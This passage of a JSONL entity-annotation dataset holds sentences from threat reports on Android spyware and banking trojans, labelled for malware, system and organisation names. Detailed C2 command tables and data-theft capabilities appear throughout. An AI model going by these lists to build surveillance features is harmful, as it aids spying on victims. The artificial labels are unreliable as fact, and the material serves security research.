"cyner_train_002487", "source": "cyner_train"}} {"text": "The malware uses HTTP for communication with the C2 server for command handling and data exfiltration .", "spans": {}, "info": {"id": "cyner_train_002489", "source": "cyner_train"}} {"text": "Here is a command and control protocol fragment : Commands from C2 server parsing In total , the malicious APK handles 16 different commands : Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info , such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history ( limited to a given date ) 6 reqsmscal.php", "spans": {}, "info": {"id": "cyner_train_002490", "source": "cyner_train"}} {"text": "Exfiltrate 
Chrome browser history ( limited to a given date ) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 reqcalllog.php Commands not yet", "spans": {}, "info": {"id": "cyner_train_002491", "source": "cyner_train"}} {"text": "implemented 9 reqcalllog.php Take photo ( muted audio ) with rear camera , send to C2 10 reqcalllog.php Take photo ( muted audio ) with front camera , send to C2 All observed samples with Smali injections were signed by the same debug certificate ( 0x936eacbe07f201df ) .", "spans": {}, "info": {"id": "cyner_train_002492", "source": "cyner_train"}} {"text": "As we know from our investigation , traces of the first development activities were found at the end of 2016 , but the main distribution campaign began in 2018 ( end of 2017 ) .", "spans": {}, "info": {"id": "cyner_train_002493", "source": "cyner_train"}} {"text": "Based on our detection statistics , the main infection vector is the spread of Trojanized applications directly to victims via Telegram and WhatsApp messengers .", "spans": {}, "info": {"id": "cyner_train_002494", "source": "cyner_train"}} {"text": "There are the following relevant detection paths ( the last one is an alternative Telegram client – “ Telegram X “ ) : Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source During the course", "spans": {}, "info": {"id": "cyner_train_002495", "source": "cyner_train"}} {"text": "of our analysis , we also found samples sharing code with 
the ViceLeaker malware , in particular they shared a delimiter that was used in both cases to parse commands from the C2 server .", "spans": {"MALWARE: ViceLeaker": [[62, 72]]}, "info": {"id": "cyner_train_002496", "source": "cyner_train"}} {"text": "This would be a very unusual coincidence .", "spans": {}, "info": {"id": "cyner_train_002497", "source": "cyner_train"}} {"text": "Even when a false flag might also be a possibility , we consider this to be unlikely .", "spans": {}, "info": {"id": "cyner_train_002498", "source": "cyner_train"}} {"text": "The samples sharing this overlap are modified versions of an open source Jabber/XMPP client called “ Conversations ” with some code additions .", "spans": {"SYSTEM: Jabber/XMPP": [[73, 84]]}, "info": {"id": "cyner_train_002499", "source": "cyner_train"}} {"text": "The legitimate version of this app is also available on Google Play .", "spans": {"SYSTEM: Google Play": [[56, 67]]}, "info": {"id": "cyner_train_002500", "source": "cyner_train"}} {"text": "The Conversations modified samples differ from the original one in the getKnownHosts method that was modified to replace the main XMPP host with the attackers ’ C2 server : It appears that the attackers were using a specific C2 for the use of that app .", "spans": {"SYSTEM: XMPP": [[130, 134]]}, "info": {"id": "cyner_train_002501", "source": "cyner_train"}} {"text": "Another important modification is in the message transfer process : With this modification , an application sends device location coordinates with every message .", "spans": {}, "info": {"id": "cyner_train_002502", "source": "cyner_train"}} {"text": "In addition , we did not see traces of the Smali injection .", "spans": {}, "info": {"id": "cyner_train_002504", "source": "cyner_train"}} {"text": "In this case we found traces of dx/dexmerge compilers , which means that , this time , the attackers just imported the original source code into an Android IDE ( such as Android Studio , for instance ) and compiled 
it with their own modifications .", "spans": {"SYSTEM: Android": [[148, 155]], "SYSTEM: Android Studio": [[170, 184]]}, "info": {"id": "cyner_train_002505", "source": "cyner_train"}} {"text": "We do not know why , but we suspect that it was an attempt to hide the origin of the application .", "spans": {}, "info": {"id": "cyner_train_002507", "source": "cyner_train"}} {"text": "This brought to us the hypothesis that this might be a version used by the group behind ViceLeaker for internal communication or for other , unclear purposes .", "spans": {"MALWARE: ViceLeaker": [[88, 98]]}, "info": {"id": "cyner_train_002509", "source": "cyner_train"}} {"text": "All the detections of this backdoored app were geolocated in Iran .", "spans": {}, "info": {"id": "cyner_train_002510", "source": "cyner_train"}} {"text": "Backdoored Conversations C2 server analysis During the analysis of the Smali injected apps and their C2 server infrastructure we hadn ’ t found any interesting clues , but things changed when we looked at the C2 server of the linked Conversations messenger .", "spans": {}, "info": {"id": "cyner_train_002511", "source": "cyner_train"}} {"text": "It uses “ 185.51.201 [ .", "spans": {}, "info": {"id": "cyner_train_002512", "source": "cyner_train"}} {"text": "] 133 ” as a main C2 address , and there is only one domain that is hosted on this dedicated server – iliageram [ .", "spans": {}, "info": {"id": "cyner_train_002513", "source": "cyner_train"}} {"text": "Note that we later found versions that used the domain as a C2 directly instead of the IP address .", "spans": {}, "info": {"id": "cyner_train_002515", "source": "cyner_train"}} {"text": "The record contains a personal email address : WHOIS records of C2 server exposing the attacker ’ s email address We were aware of the possibility that the attackers might be using a compromised email account , so we dug deeper to find more information related to this email address .", "spans": {}, "info": {"id": 
"cyner_train_002516", "source": "cyner_train"}} {"text": "A quick search produced results about a personal page and , what is more interesting , a GitHub account that contains a forked Conversation repository .", "spans": {"ORGANIZATION: GitHub": [[89, 95]]}, "info": {"id": "cyner_train_002517", "source": "cyner_train"}} {"text": "Related Github account contains forked Conversations repository Summarizing all the found clues , we have the following attribution flow : Conclusion The operation of ViceLeaker is still ongoing , as is our research .", "spans": {"ORGANIZATION: Github": [[8, 14]], "MALWARE: ViceLeaker": [[167, 177]]}, "info": {"id": "cyner_train_002518", "source": "cyner_train"}} {"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]]}, "info": {"id": "cyner_train_002524", "source": "cyner_train"}} {"text": "By : Trend Micro April 20 , 2018 We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong .", "spans": {"ORGANIZATION: Trend Micro": [[5, 16]]}, "info": {"id": "cyner_train_002525", "source": "cyner_train"}} {"text": "The attacks use Domain Name System ( DNS ) cache poisoning/DNS spoofing , possibly through infringement techniques such as brute-force or dictionary attacks , to distribute and install malicious Android apps .", "spans": {"SYSTEM: Android": [[195, 202]]}, "info": {"id": "cyner_train_002526", "source": "cyner_train"}} {"text": "These malware pose as legitimate Facebook or Chrome applications .", "spans": {"SYSTEM: Facebook": [[33, 41]], "SYSTEM: Chrome": [[45, 51]]}, "info": {"id": "cyner_train_002528", "source": "cyner_train"}} {"text": "They are distributed from polluted DNS domains that send a notification to an unknowing victim ’ s device .", "spans": {}, "info": {"id": "cyner_train_002529", "source": "cyner_train"}} {"text": "XLoader can also hijack the infected device ( i.e. 
, send SMSs ) and sports self-protection/persistence mechanisms through device administrator privileges .", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002531", "source": "cyner_train"}} {"text": "Infection Chain As with our earlier reports in late March , the attack chain involves diverting internet traffic to attacker-specified domains by compromising and overwriting the router ’ s DNS settings .", "spans": {}, "info": {"id": "cyner_train_002532", "source": "cyner_train"}} {"text": "A fake alert will notify and urge the user to access the malicious domain and download XLoader .", "spans": {"MALWARE: XLoader": [[87, 94]]}, "info": {"id": "cyner_train_002533", "source": "cyner_train"}} {"text": "Technical Analysis XLoader first loads the encrypted payload from Assets/db as test.dex to drop the necessary modules then requests for device administrator privileges .", "spans": {"MALWARE: XLoader": [[19, 26]]}, "info": {"id": "cyner_train_002534", "source": "cyner_train"}} {"text": "Once granted permission , it hides its icon from the launcher application list then starts a service that it keeps running in the background .", "spans": {}, "info": {"id": "cyner_train_002535", "source": "cyner_train"}} {"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON", "spans": {}, "info": {"id": "cyner_train_002539", "source": "cyner_train"}} {"text": "android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events .", "spans": {"MALWARE: XLoader": [[134, 141]]}, "info": {"id": 
"cyner_train_002540", "source": "cyner_train"}} {"text": "It can also create a simple HTTP server on the infected device to deceive victims .", "spans": {}, "info": {"id": "cyner_train_002541", "source": "cyner_train"}} {"text": "It shows a web phishing page whenever the affected device receives a broadcast event ( i.e. , if a new package is installed or if the device ’ s screen is on ) to steal personal data , such as those keyed in for banking apps .", "spans": {}, "info": {"id": "cyner_train_002542", "source": "cyner_train"}} {"text": "The phishing page is translated in Korean , Japanese , Chinese , and English , which are hardcoded in the payload .", "spans": {}, "info": {"id": "cyner_train_002543", "source": "cyner_train"}} {"text": "Its data-stealing capabilities include collecting SMSs after receiving an SMS-related broadcast event and covertly recording phone calls .", "spans": {}, "info": {"id": "cyner_train_002546", "source": "cyner_train"}} {"text": "XLoader can also hijack accounts linked to financial or game-related apps installed on the affected device .", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002547", "source": "cyner_train"}} {"text": "XLoader can also start other attacker-specified packages .", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002548", "source": "cyner_train"}} {"text": "By monitoring the package installation broadcast event , XLoader can start their packages .", "spans": {"MALWARE: XLoader": [[57, 64]]}, "info": {"id": "cyner_train_002550", "source": "cyner_train"}} {"text": "This enables it to launch malicious apps without the user ’ s awareness and explicit consent .", "spans": {}, "info": {"id": "cyner_train_002551", "source": "cyner_train"}} {"text": "We reverse engineered XLoader and found that it appears to target South Korea-based banks and game development companies .", "spans": {"MALWARE: XLoader": [[22, 29]]}, "info": {"id": "cyner_train_002552", "source": "cyner_train"}} 
{"text": "XLoader also prevents victims from accessing the device ’ s settings or using a known antivirus ( AV ) app in the country .", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002553", "source": "cyner_train"}} {"text": "XLoader can also load multiple malicious modules to receive and execute commands from its remote command-and-control ( C & C ) server , as shown below : Here ’ s a list of the modules and their functions : sendSms — send SMS/MMS to a specified address setWifi — enable or disable Wi-Fi connection gcont — collect all the device ’ s contacts lock — currently just an input lock status in the settings ( pref ) file , but may be used as a screenlocking ransomware bc — collect all contacts", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002554", "source": "cyner_train"}} {"text": "from the Android device and SIM card setForward — currently not implemented , but can be used to hijack the infected device getForward — currently not implemented , but can be used to hijack the infected device hasPkg — check the device whether a specified app is installed or not setRingerMode — set the device ’ s ringer mode setRecEnable — set the device ’ s ringer mode as silent reqState — get a detailed phone connection status , which includes activated network and Wi-Fi ( with or without password ) showHome —", "spans": {"SYSTEM: Android": [[9, 16]]}, "info": {"id": "cyner_train_002555", "source": "cyner_train"}} {"text": "force the device ’ s back to the home screen getnpki : get files/content from the folder named NPKI ( contains certificates related to financial transactions ) http — access a specified network using HttpURLConnection onRecordAction — simulate a number-dialed tone call — call a specified number get_apps — get all the apps installed on the device show_fs_float_window — show a full-screen window for phishing Of note is XLoader ’ s abuse of the WebSocket protocol ( supported in many browsers", "spans": 
{"MALWARE: XLoader": [[421, 428]]}, "info": {"id": "cyner_train_002556", "source": "cyner_train"}} {"text": "and web applications ) via ws ( WebSockets ) or wss ( WebSockets over SSL/TLS ) to communicate with its C & C servers .", "spans": {}, "info": {"id": "cyner_train_002557", "source": "cyner_train"}} {"text": "The abuse of the WebSocket protocol provides XLoader with a persistent connection between clients and servers where data can be transported any time .", "spans": {"MALWARE: XLoader": [[45, 52]]}, "info": {"id": "cyner_train_002559", "source": "cyner_train"}} {"text": "Mitigations XLoader will not download malicious apps if the Android device uses a mobile data connection .", "spans": {"MALWARE: XLoader": [[12, 19]]}, "info": {"id": "cyner_train_002561", "source": "cyner_train"}} {"text": "Nevertheless , users should practice proper security hygiene to mitigate threats that may take advantage of a home or business router ’ s security gaps .", "spans": {}, "info": {"id": "cyner_train_002562", "source": "cyner_train"}} {"text": "Employ stronger credentials , for instance , to make them less susceptible to unauthorized access .", "spans": {}, "info": {"id": "cyner_train_002563", "source": "cyner_train"}} {"text": "Regularly update and patch the router ’ s software and firmware to prevent exploits , and enable its built-in firewall .", "spans": {}, "info": {"id": "cyner_train_002564", "source": "cyner_train"}} {"text": "For system administrators and information security professionals , configuring the router to be more resistant to attacks like DNS cache poisoning can help mitigate similar threats .", "spans": {}, "info": {"id": "cyner_train_002565", "source": "cyner_train"}} {"text": "Everyday users can do the same by checking the router ’ s DNS settings if they ’ ve been modified .", "spans": {}, "info": {"id": "cyner_train_002566", "source": "cyner_train"}} {"text": "Even threats like DNS cache poisoning employ social engineering , so users should also be 
more prudent against suspicious or unknown messages that have telltale signs of malware .", "spans": {}, "info": {"id": "cyner_train_002567", "source": "cyner_train"}} {"text": "We have worked with Google and they ensure that Google Play Protect proactively catches apps of this nature .", "spans": {"ORGANIZATION: Google": [[20, 26]], "SYSTEM: Google Play Protect": [[48, 67]]}, "info": {"id": "cyner_train_002568", "source": "cyner_train"}} {"text": "No instances of these apps were found in Google Play .", "spans": {"SYSTEM: Google Play": [[41, 52]]}, "info": {"id": "cyner_train_002569", "source": "cyner_train"}} {"text": "September 08 , 2020 TikTok Spyware A detailed analysis of spyware masquerading as TikTok A recent threat to ban TikTok in the United States has taken the internet by storm and received mixed reactions from social media and internet users .", "spans": {"SYSTEM: TikTok": [[20, 26], [82, 88], [112, 118]]}, "info": {"id": "cyner_train_002570", "source": "cyner_train"}} {"text": "U.S. President Donald Trump has ordered ByteDance , the parent company of TikTok , to sell its U.S. TikTok assets and also issued executive orders that would ban the social media apps TikTok and WeChat from operating in the U.S. 
if the sale doesn ’ t happen in the next few weeks .", "spans": {"ORGANIZATION: ByteDance": [[40, 49]], "SYSTEM: TikTok": [[74, 80], [100, 106], [184, 190]], "SYSTEM: WeChat": [[195, 201]]}, "info": {"id": "cyner_train_002571", "source": "cyner_train"}} {"text": "On the other side , ByteDance has filed a lawsuit suing the Trump administration .", "spans": {"ORGANIZATION: ByteDance": [[20, 29]]}, "info": {"id": "cyner_train_002572", "source": "cyner_train"}} {"text": "When popular applications come under fire and are featured prominently in the news , hackers get excited as these newsworthy apps can become their latest target .", "spans": {}, "info": {"id": "cyner_train_002573", "source": "cyner_train"}} {"text": "Generally , after an application gets banned from an official app store , such as Google Play , users try to find alternative ways to download the app .", "spans": {"SYSTEM: Google Play": [[82, 93]]}, "info": {"id": "cyner_train_002575", "source": "cyner_train"}} {"text": "In doing so , users can become victims to malicious apps portraying themselves as the original app .", "spans": {}, "info": {"id": "cyner_train_002576", "source": "cyner_train"}} {"text": "Recently there was a huge wave of SMS messages , as well as Whatsapp messages , making the rounds asking users to download the latest version of TikTok at hxxp : //tiny [ .", "spans": {"SYSTEM: Whatsapp": [[60, 68]], "SYSTEM: TikTok": [[145, 151]]}, "info": {"id": "cyner_train_002577", "source": "cyner_train"}} {"text": "In reality , this downloaded app is a fake app that asks for credentials and Android permissions ( including camera and phone permissions ) , resulting in the user being bombarded with advertisements .", "spans": {"SYSTEM: Android": [[77, 84]]}, "info": {"id": "cyner_train_002579", "source": "cyner_train"}} {"text": "Recently , we have come across another variant of this app portraying itself as TikTok Pro , but this is a full-fledged spyware with premium features to spy on victim with 
ease .", "spans": {"SYSTEM: TikTok Pro": [[80, 90]]}, "info": {"id": "cyner_train_002580", "source": "cyner_train"}} {"text": "( Please note this is a different app and not the same as the one being spread by hxxp : //tiny [ .", "spans": {}, "info": {"id": "cyner_train_002581", "source": "cyner_train"}} {"text": ") Technical Analysis App Name : TikTok Pro Hash : 9fed52ee7312e217bd10d6a156c8b988 Package Name : com.example.dat.a8andoserverx Upon installation , the spyware portrays itself as TikTok using the name TikTok Pro .", "spans": {"SYSTEM: TikTok Pro": [[32, 42], [201, 211]], "SYSTEM: TikTok": [[179, 185]]}, "info": {"id": "cyner_train_002583", "source": "cyner_train"}} {"text": "As soon as a user tries to open the app , it launches a fake notification and soon the notification as well as the app icon disappears .", "spans": {}, "info": {"id": "cyner_train_002584", "source": "cyner_train"}} {"text": "This fake notification tactic is used to redirect the user 's attention , meanwhile the app hides itself , making the user believe the app to be faulty .", "spans": {}, "info": {"id": "cyner_train_002585", "source": "cyner_train"}} {"text": "This functionality can be seen in Figure 1 .", "spans": {}, "info": {"id": "cyner_train_002586", "source": "cyner_train"}} {"text": "First , an activity named MainActivity fires up , taking care of hiding the icon and showing the fake notification .", "spans": {}, "info": {"id": "cyner_train_002589", "source": "cyner_train"}} {"text": "The spyware also appears to have an additional payload stored under the /res/raw/ directory .", "spans": {}, "info": {"id": "cyner_train_002591", "source": "cyner_train"}} {"text": "The conditions to build an additional payload are never met .", "spans": {}, "info": {"id": "cyner_train_002595", "source": "cyner_train"}} {"text": "Going one step further , we rebuilt the malware to execute the apparent functionality of generating a payload , but discovered that the APK stored in the /res/raw/ 
directory is empty .", "spans": {}, "info": {"id": "cyner_train_002596", "source": "cyner_train"}} {"text": "The placement of the decoy functionality is likely designed to confuse the malware researchers .", "spans": {}, "info": {"id": "cyner_train_002597", "source": "cyner_train"}} {"text": "It is also possible that this functionality is under development , making this placeholder code incomplete .", "spans": {}, "info": {"id": "cyner_train_002598", "source": "cyner_train"}} {"text": "MainService is the brain of this spyware and controls almost everything—from stealing the victim 's data to deleting it .", "spans": {}, "info": {"id": "cyner_train_002601", "source": "cyner_train"}} {"text": "All of its capabilities are discussed later in this blog .", "spans": {}, "info": {"id": "cyner_train_002602", "source": "cyner_train"}} {"text": "Hide Icon Figure 3 : Code showing the hiding icon and starting service .", "spans": {}, "info": {"id": "cyner_train_002603", "source": "cyner_train"}} {"text": "As MainService is the main controller , the developer has taken the appropriate actions to keep it functional and running at all times .", "spans": {}, "info": {"id": "cyner_train_002604", "source": "cyner_train"}} {"text": "Broadcast receivers are components that allow you to register for various Android events .", "spans": {"SYSTEM: Android": [[74, 81]]}, "info": {"id": "cyner_train_002606", "source": "cyner_train"}} {"text": "In this case , it registers three broadcast receivers : MyReceiver - Triggers when the device is booted .", "spans": {}, "info": {"id": "cyner_train_002607", "source": "cyner_train"}} {"text": "MyReceiver and AlarmReceiver start the MainService whenever appropriate events occur .", "spans": {}, "info": {"id": "cyner_train_002610", "source": "cyner_train"}} {"text": "This tactic is very common among malware developers to ensure the malware is not killed by the Android OS or by any other means .", "spans": {"SYSTEM: Android": [[95, 102]]}, "info": 
{"id": "cyner_train_002611", "source": "cyner_train"}} {"text": "Figure 4 shows MyReceiver in action where it eventually calls the MainService service .", "spans": {}, "info": {"id": "cyner_train_002612", "source": "cyner_train"}} {"text": "The InterceptCall receiver is triggered whenever there is an incoming or outgoing call .", "spans": {}, "info": {"id": "cyner_train_002614", "source": "cyner_train"}} {"text": "It sets particular parameters in relation to call details and a further service named calls takes the control as seen in Figure 5 .", "spans": {}, "info": {"id": "cyner_train_002615", "source": "cyner_train"}} {"text": "Call Service Figure 5 : Code for the calls service As seen above , the calls service stores incoming call details in .mp3 format in the /sdcard/DCIM/.dat/ directory with file name appended with \" In_ '' for incoming calls and \" Out_ '' for outgoing calls .", "spans": {}, "info": {"id": "cyner_train_002616", "source": "cyner_train"}} {"text": "How these recorded calls are sent to the command and control server ( CnC ) is taken care of by MainService , which is discussed next .", "spans": {}, "info": {"id": "cyner_train_002617", "source": "cyner_train"}} {"text": "This functionality can be seen in Figure 6 .", "spans": {}, "info": {"id": "cyner_train_002621", "source": "cyner_train"}} {"text": "MainService has the following capabilities : Steal SMS messages Send SMS messages Steal the victim 's location Capture photos Execute commands Capture screenshots Call phone numbers Initiate other apps Steal Facebook credentials , etc All of the above functionalities take place on the basis of commands sent by the attacker .", "spans": {"SYSTEM: Facebook": [[208, 216]]}, "info": {"id": "cyner_train_002623", "source": "cyner_train"}} {"text": "Stolen data is stored in external storage under the /DCIM/ directory with a hidden sub-directory named \" .dat '' .", "spans": {}, "info": {"id": "cyner_train_002624", "source": "cyner_train"}} {"text": "Below 
is the list of all the commands catered by the C & C server .", "spans": {}, "info": {"id": "cyner_train_002625", "source": "cyner_train"}} {"text": "Command Action Unistxcr Restart the app dowsizetr Send the file stored in the /sdcard/DCIM/.dat/ directory to the C & C server Caspylistx Get a list of all hidden files in the /DCIM/.dat/ directory spxcheck Check whether call details are collected by the spyware S8p8y0 Delete call details stored by the spyware screXmex Take screenshots of the device screen Batrxiops Check battery status L4oclOCMAWS Fetch the victim 's location GUIFXB Launch", "spans": {}, "info": {"id": "cyner_train_002626", "source": "cyner_train"}} {"text": "the fake Facebook login page IODBSSUEEZ Send a file containing stolen Facebook credentials to the C & C server FdelSRRT Delete files containing stolen Facebook credentials chkstzeaw Launch Facebook LUNAPXER Launch apps according to the package name sent by the C & C server Gapxplister Get a list of all installed applications DOTRall8xxe Zip all the stolen files and store in the /DCIM/.dat/ directory Acouxacour Get a list of accounts on the victim 's device Fimxmiisx Open the camera", "spans": {"SYSTEM: Facebook": [[9, 17], [70, 78], [151, 159], [189, 197]]}, "info": {"id": "cyner_train_002627", "source": "cyner_train"}} {"text": "Scxreexcv4 Capture an image micmokmi8x Capture audio Yufsssp Get latitude and longitude GExCaalsss7 Get call logs PHOCAs7 Call phone numbers sent by the C & C server Gxextsxms Get a list of inbox SMS messages Msppossag Send SMS with message body sent by the C & C server Getconstactx Get a list of all contacts Rinxgosa Play a ringtone bithsssp64 Execute commands sent by the C & C server DOWdeletx Deletes", "spans": {}, "info": {"id": "cyner_train_002628", "source": "cyner_train"}} {"text": "the file specified by the C & C server Deldatall8 Delete all files stored in the /sdcard/DCIM/.dat/ directory We do n't have the space to cover all of the commands , but let 's take a 
look at some of the major ones .", "spans": {}, "info": {"id": "cyner_train_002629", "source": "cyner_train"}} {"text": "Upon receiving the command GUIFXB , the spyware launches a fake Facebook login page .", "spans": {"SYSTEM: Facebook": [[64, 72]]}, "info": {"id": "cyner_train_002631", "source": "cyner_train"}} {"text": "As soon as the victim tries to log in , it stores the victim 's credentials in /storage/0/DCIM/.fdat Facebook Login Figure 7 : Fake Facebook login The second command is IODBSSUEEZ , which further sends stolen credentials to the C & C server , as seen in Figure 8 .", "spans": {"SYSTEM: Facebook": [[101, 109], [132, 140]]}, "info": {"id": "cyner_train_002632", "source": "cyner_train"}} {"text": "This functionality can be easily further extended to steal other information , such as bank credentials , although we did not see any banks being targeted in this attack .", "spans": {}, "info": {"id": "cyner_train_002634", "source": "cyner_train"}} {"text": "Calling functionality Command PHOCAs7 initiates calling functionality .", "spans": {}, "info": {"id": "cyner_train_002635", "source": "cyner_train"}} {"text": "Call Command Figure 9 : The calling functionality .", "spans": {}, "info": {"id": "cyner_train_002637", "source": "cyner_train"}} {"text": "The phone number is fetched from a response from the C & C server and is stored in str3 variable , which further is utilized using the tel : function .", "spans": {}, "info": {"id": "cyner_train_002638", "source": "cyner_train"}} {"text": "Stealing SMS The Gxextsxms command is responsible for fetching all the SMS messages from the victim 's device and sending it over to the C & C server .", "spans": {}, "info": {"id": "cyner_train_002639", "source": "cyner_train"}} {"text": "Stealing SMS Figure 10 : Stealing SMS messages .", "spans": {}, "info": {"id": "cyner_train_002640", "source": "cyner_train"}} {"text": "Similarly , there are many crucial commands that further allow this spyware to perform additional 
functionality , such as executing commands sent by the C & C , taking photos , capturing screenshots , stealing location information , and more .", "spans": {}, "info": {"id": "cyner_train_002641", "source": "cyner_train"}} {"text": "Further analysis Upon further research , we found this spyware to be developed by a framework similar to Spynote and Spymax , meaning this could be an updated version of these Trojan builders , which allow anyone , even with limited knowledge , to develop full-fledged spyware .", "spans": {"MALWARE: Spynote": [[105, 112]], "MALWARE: Spymax": [[117, 123]]}, "info": {"id": "cyner_train_002642", "source": "cyner_train"}} {"text": "Many of the functionalities seen in this spyware are similar to Spynote and Spymax based on the samples we analyzed with some modifications .", "spans": {"MALWARE: Spynote": [[64, 71]], "MALWARE: Spymax": [[76, 82]]}, "info": {"id": "cyner_train_002643", "source": "cyner_train"}} {"text": "This spyware sample communicates over dynamic DNS .", "spans": {}, "info": {"id": "cyner_train_002644", "source": "cyner_train"}} {"text": "Other common functionalities include executing commands received from the attacker , taking screenshots of the victim 's device , fetching locations , stealing SMS messages and most common features that every spyware may possess .", "spans": {}, "info": {"id": "cyner_train_002646", "source": "cyner_train"}} {"text": "Stealing Facebook credentials using fake Facebook activity is something we did n't observe in Spynote/Spymax versions but was seen in this spyware .", "spans": {"ORGANIZATION: Facebook": [[9, 17], [41, 49]], "MALWARE: Spynote/Spymax": [[94, 108]]}, "info": {"id": "cyner_train_002647", "source": "cyner_train"}} {"text": "This framework allows anyone to develop a malicious app with the desired icon and communication address .", "spans": {}, "info": {"id": "cyner_train_002648", "source": "cyner_train"}} {"text": "Some of the icons used can be seen below .", "spans": {}, "info": 
{"id": "cyner_train_002649", "source": "cyner_train"}} {"text": "We found 280 such apps in the past three months .", "spans": {}, "info": {"id": "cyner_train_002650", "source": "cyner_train"}} {"text": "It is very easy to trick victims to fall for such attacks .", "spans": {}, "info": {"id": "cyner_train_002656", "source": "cyner_train"}} {"text": "In doing so , users can mistakenly install malicious apps , such as the spyware mentioned in this blog .", "spans": {}, "info": {"id": "cyner_train_002658", "source": "cyner_train"}} {"text": "The precautions you take online have been covered extensively in almost all of our blogs ; even so , we believe this information bears repeating .", "spans": {}, "info": {"id": "cyner_train_002659", "source": "cyner_train"}} {"text": "Always keep the \" Unknown Sources '' option disabled in the Android device .", "spans": {"SYSTEM: Android": [[60, 67]]}, "info": {"id": "cyner_train_002662", "source": "cyner_train"}} {"text": "This disallows apps to be installed on your device from unknown sources .", "spans": {}, "info": {"id": "cyner_train_002663", "source": "cyner_train"}} {"text": "We would also like to mention that if you come across an app hiding it 's icon , always try to search for the app in your device settings ( by going to Settings - > Apps - > Search for icon that was hidden ) .", "spans": {}, "info": {"id": "cyner_train_002664", "source": "cyner_train"}} {"text": "In the case of this spyware , search for app named TikTok Pro .", "spans": {"SYSTEM: TikTok Pro": [[51, 61]]}, "info": {"id": "cyner_train_002665", "source": "cyner_train"}} {"text": "MITRE TAGS Action Tag ID App auto-start at device boot T1402 Input prompt T1411 Capture SMS messages T1412 Application discovery T1418 Capture audio T1429 Location tracking T1430 Access contact list T1432 Access call log T1433 Commonly used port T1436 Standard application layer protocol T1437 Masquerage as legitimate application T1444 Suppress application icon T1508 Capture 
camera T1512 Screen capture T1513 Foreground persistence T1541 DualToy : New Windows Trojan Sideloads Risky Apps to Android and iOS Devices", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "MALWARE: DualToy": [[440, 447]], "SYSTEM: Windows": [[454, 461]], "SYSTEM: Android": [[493, 500]], "SYSTEM: iOS": [[505, 508]]}, "info": {"id": "cyner_train_002666", "source": "cyner_train"}} {"text": "By Claud Xiao September 13 , 2016 at 5:00 AM Over the past two years , we ’ ve observed many cases of Microsoft Windows and Apple iOS malware designed to attack mobile devices .", "spans": {"SYSTEM: Microsoft Windows": [[102, 119]], "SYSTEM: Apple iOS": [[124, 133]]}, "info": {"id": "cyner_train_002667", "source": "cyner_train"}} {"text": "This attack vector is increasingly popular with malicious actors as almost everyone on the planet carries at least one mobile device they interact with throughout any given day .", "spans": {}, "info": {"id": "cyner_train_002668", "source": "cyner_train"}} {"text": "Thanks to a relative lack of security controls applied to mobile devices , these devices have become very attractive targets for a broad range of malicious actors .", "spans": {}, "info": {"id": "cyner_train_002669", "source": "cyner_train"}} {"text": "When DualToy began to spread in January 2015 , it was only capable of infecting Android devices .", "spans": {"MALWARE: DualToy": [[5, 12]], "SYSTEM: Android": [[80, 87]]}, "info": {"id": "cyner_train_002671", "source": "cyner_train"}} {"text": "However , within six months the malicious actors added the capability to infect iOS devices .", "spans": {"SYSTEM: iOS": [[80, 83]]}, "info": {"id": "cyner_train_002672", "source": "cyner_train"}} {"text": "It mainly targets Chinese users , but has also successfully affected people and organizations in the United States , United Kingdom , Thailand , Spain , and Ireland .", "spans": {}, "info": {"id": "cyner_train_002674", "source": "cyner_train"}} {"text": "Credential phishing and an Android 
banking Trojan combine in Austrian mobile attacks NOVEMBER 03 , 2017 Overview Credential phishing , banking Trojans , and credit card phishing schemes are common threats that we regularly observe both at scale and in more targeted attacks .", "spans": {"SYSTEM: Android": [[27, 34]]}, "info": {"id": "cyner_train_002675", "source": "cyner_train"}} {"text": "However , Proofpoint researchers have recently observed phishing attacks that incorporate all of these elements in a single , multistep scheme involving the Marcher Android banking Trojan targeting customers of large Austrian banks .", "spans": {"ORGANIZATION: Proofpoint": [[10, 20]], "MALWARE: Marcher": [[157, 164]]}, "info": {"id": "cyner_train_002676", "source": "cyner_train"}} {"text": "Attacks involving Marcher have become increasingly sophisticated , with documented cases involving multiple attack vectors and a variety of targeted financial services and communication platforms [ 1 ] [ 2 ] .", "spans": {"MALWARE: Marcher": [[18, 25]]}, "info": {"id": "cyner_train_002677", "source": "cyner_train"}} {"text": "In this case , a threat actor has been targeting customers of Bank Austria , Raiffeisen Meine Bank , and Sparkasse since at least January 2017 .", "spans": {}, "info": {"id": "cyner_train_002678", "source": "cyner_train"}} {"text": "The attacks described here begin with a banking credential phishing scheme , followed by an attempt to trick the victim into installing Marcher , and finally with attempts to steal credit card information by the banking Trojan itself .", "spans": 